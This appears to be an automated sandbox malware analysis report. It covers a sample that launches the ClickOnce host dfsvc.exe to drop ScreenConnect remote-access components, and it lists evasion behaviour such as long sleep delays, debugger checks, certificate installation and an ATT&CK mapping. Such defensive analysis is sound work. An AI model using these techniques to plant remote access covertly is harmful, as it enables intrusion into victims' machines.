Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 2AEEE580000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 2AEEFEC0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 1822			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 2607			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dll	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe TID: 6640	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6872	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6956	Thread sleep time: -130350s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6872	Thread sleep time: -600000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F24B9B FindFirstFileExA,

0_2_00F24B9B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF370D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/
Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F21920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F21920

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

0_2_00F21000

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F237C7 mov eax, dword ptr fs:[00000030h]

0_2_00F237C7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F269E3 GetProcessHeap,

0_2_00F269E3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F21493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F21493
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F21920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F21920
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F246C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F246C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Code function: 0_2_00F21AAD SetUnhandledExceptionFilter,	0_2_00F21AAD

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)

Source: ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Code function: 0_2_00F21807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F21807

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	2 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Bootkit	1 Scheduled Task/Job	1 Modify Registry	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	31 Virtualization/Sandbox Evasion	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Hidden Users	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Bootkit	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Install Root Certificate	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Timestomp	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe